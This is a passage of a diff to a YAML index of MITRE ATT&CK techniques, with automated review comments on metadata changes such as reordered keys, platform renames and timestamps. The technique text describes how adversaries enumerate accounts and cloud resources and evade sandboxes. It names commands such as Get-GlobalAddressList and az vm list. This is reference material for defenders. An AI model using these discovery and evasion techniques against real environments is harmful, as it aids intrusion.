PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+ In on-premises Exchange and Exchange Online, the Get-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_deprecated: false
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1497.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
+ id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+ created: '2020-02-21T21:08:33.237Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1087/003
+ external_id: T1087.003
+ - source_name: Black Hills Attacking Exchange MailSniper, 2016
+ description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+ Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+ - source_name: Google Workspace Global Access List
+ description: Google. (n.d.). Retrieved March 16, 2021.
+ url: https://support.google.com/a/answer/166870?hl=en
+ - source_name: Microsoft Exchange Address Lists
+ description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+ Retrieved March 26, 2020.
+ url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+ - source_name: Microsoft getglobaladdresslist
+ description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+ 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1497.003:
+ technique:
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
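Review bot: three substantive changes are buried inside what is otherwise a wholesale key reorder of T1010, T1087.003 and T1497.003, and each deserves a line in the commit message: the Prevailion reference for T1010 now points at a web.archive.org snapshot of the original URL (a sensible fix for a link that is at risk of disappearing); T1087.003's description fixes the `theGet-GlobalAddressList` typo and its platforms collapse `Office 365` and `Google Workspace` into `Office Suite`, with `x_mitre_version` bumped `1.1` to `1.2`; and `x_mitre_permissions_required: [User]` is dropped, which is consistent with recent ATT&CK releases no longer populating that field. None of these is wrong, but a reviewer scanning 120 removed lines will miss them unless they are called out.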
@@ -60491,6 +61139,12 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -60500,9 +61154,14 @@ discovery:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -60512,8 +61171,44 @@ discovery:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests:
- name: Delay execution with ping
@@ -60542,91 +61237,90 @@ discovery:
name: sh
T1580:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Cloud Infrastructure Discovery
+ description: |-
+ An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+ Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+ An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Regina Elwell
- Praetorian
- Isif Ibrahima, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+ components. Monitor logs for actions that could be taken to gather information
+ about cloud infrastructure, including the use of discovery API calls by new
+ or unexpected users and enumerations from unknown or malicious IP addresses.
+ To reduce false positives, valid change management procedures could introduce
+ a known identifier that is logged with the change (e.g., tag or header) if
+ supported by the cloud provider, to help distinguish valid, expected actions
+ from malicious ones.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Instance: Instance Enumeration'
+ - 'Cloud Storage: Cloud Storage Enumeration'
+ - 'Volume: Volume Enumeration'
+ - 'Snapshot: Snapshot Enumeration'
type: attack-pattern
id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
created: '2020-08-20T17:51:25.671Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1580
url: https://attack.mitre.org/techniques/T1580
+ external_id: T1580
- source_name: Expel IO Evil in AWS
- url: https://expel.io/blog/finding-evil-in-aws/
description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
Evil in AWS. Retrieved June 25, 2020.
+ url: https://expel.io/blog/finding-evil-in-aws/
- source_name: AWS Head Bucket
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
14, 2022.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
- source_name: AWS Get Public Access Block
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
- source_name: AWS Describe DB Instances
- url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
- source_name: Amazon Describe Instance
- url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
description: Amazon. (n.d.). describe-instance-information. Retrieved March
3, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
- source_name: Amazon Describe Instances API
- url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
- source_name: Google Compute Instances
- url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
description: Google. (n.d.). gcloud compute instances list. Retrieved May
26, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
- source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
- source_name: Microsoft AZ CLI
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
- url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
- Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
- An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Infrastructure Discovery
- x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
- components. Monitor logs for actions that could be taken to gather information
- about cloud infrastructure, including the use of discovery API calls by new
- or unexpected users and enumerations from unknown or malicious IP addresses.
- To reduce false positives, valid change management procedures could introduce
- a known identifier that is logged with the change (e.g., tag or header) if
- supported by the cloud provider, to help distinguish valid, expected actions
- from malicious ones.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Instance: Instance Enumeration'
- - 'Cloud Storage: Cloud Storage Enumeration'
- - 'Volume: Volume Enumeration'
- - 'Snapshot: Snapshot Enumeration'
- x_mitre_attack_spec_version: 2.1.0
+ url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1580
atomic_tests:
- name: AWS - EC2 Enumeration from Cloud Instance
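Review bot: the `Mandiant M-Trends 2020` URL moves from `content.fireeye.com/m-trends/rpt-m-trends-2020` to a PDF on mandiant.com, which is the right call given the FireEye domain migration. Two issues in the same block are pre-existing and belong upstream rather than in this generated file, but are worth reporting: the `Microsoft AZ CLI` reference describes `az ad user` and links the `cli/azure/ad/user` docs while the description cites it for `az vm list`; and the description text carries `(Citation: Mandiant M-Trends 2020)An adversary` with a missing space and the phrase `Adversaries have also may use`, both copied over unchanged.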
@@ -60702,7 +61396,7 @@ discovery:
elevation_required: false
T1217:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-16T14:24:40.625Z'
name: Browser Bookmark Discovery
description: |-
Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
@@ -60756,7 +61450,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1217
atomic_tests:
- name: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux
@@ -60830,7 +61523,7 @@ discovery:
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
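Review bot: The replacement line `+ Monitor processes and command-line arguments ... {{LinkById|T1059.008} commands ...` has unbalanced braces (two opening, one closing), so readers of the T1016 detection text will see a stray `{{LinkById|T1059.008}` token rather than a link, which is no better than the `(LinkById: T1059.008)` it replaces. The rest of the sentence already uses markdown links (`[PowerShell](https://attack.mitre.org/techniques/T1059/001)`), so the consistent form is `[Network Device CLI](https://attack.mitre.org/techniques/T1059/008)`; if this index is regenerated from the upstream ATT&CK STIX bundle, the fix has to land upstream or it will be overwritten on the next sync.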
@@ -60868,7 +61561,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016
atomic_tests:
- name: System Network Configuration Discovery
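Review bot: Dropping `- spec_version: '2.1'` here, and in every other technique block this patch touches (the same single-line removal repeats before `identifier: T1482`, `identifier: T1083`, `identifier: T1049`, `identifier: T1057` and so on), changes the shape of every `technique` object in the index; any consumer that validates these entries as STIX 2.1 objects, or keys on `spec_version` to pick a parser, will now find the field missing. If the generator intentionally stopped emitting it, the commit message should say so and the downstream readers of this file should be checked.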
@@ -60900,7 +61592,7 @@ discovery:
name: sh
T1087:
technique:
- modified: '2024-01-12T23:36:56.245Z'
+ modified: '2024-10-15T15:35:28.784Z'
name: Account Discovery
description: |-
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -60927,14 +61619,13 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
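Review bot: The T1087 platform list replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider` (version `'2.4'` -> `'2.5'`), which matches the ATT&CK v16 platform consolidation and the 2024-10-15 modified timestamp two hunks up. Any per-platform index that is keyed on the old names (a Google Workspace or Azure AD index) will silently lose this technique unless it is regenerated against the new names, so those derived files should be part of the same change.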
@@ -60963,7 +61654,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1482:
technique:
@@ -61023,7 +61713,7 @@ discovery:
.NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
[Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T19:18:22.305Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Domain Trust Discovery
x_mitre_detection: |
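Review bot: The `modified` timestamp for T1482 moves backwards, from `'2022-11-08T14:00:00.188Z'` to `'2022-06-16T19:18:22.305Z'`, and the same regression appears for T1049 (to 2022-09-06), T1619 (to 2022-04-11), T1069.001 (to 2023-04-07), T1614.001 (to 2021-10-15) and T1012 (to 2023-04-03) further down. An earlier modified date in a regeneration usually means the source bundle now reports a different object timestamp for these techniques; confirm which ATT&CK release this index was generated from and that the description and detection text for those techniques was not reverted along with the timestamp.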
@@ -61042,7 +61732,6 @@ discovery:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1482
atomic_tests: []
T1083:
@@ -61111,7 +61800,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1083
atomic_tests:
- name: Nix File and Directory Discovery
@@ -61170,7 +61858,7 @@ discovery:
name: sh
T1049:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-09-06T22:35:34.231Z'
name: System Network Connections Discovery
description: "Adversaries may attempt to get a listing of network connections
to or from the compromised system they are currently accessing or from remote
@@ -61247,7 +61935,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1049
atomic_tests:
- name: System Network Connections Discovery FreeBSD, Linux & MacOS
@@ -61278,35 +61965,7 @@ discovery:
name: sh
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
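Review bot: Of the 35 lines removed from T1497 in this hunk (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref`, `external_references`), nearly all are added back with identical values in the three hunks that follow, so this is key-order churn rather than a content change, and the substantive edits (the modified date, `x_mitre_attack_spec_version` 2.1.0 -> 3.2.0, the new `x_mitre_deprecated` and `revoked` flags, the changed reference retrieval dates) are buried in it. Emitting keys in a fixed canonical order from the generator would keep future regeneration diffs reviewable.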
@@ -61318,6 +61977,10 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -61328,8 +61991,14 @@ discovery:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -61339,9 +62008,28 @@ discovery:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
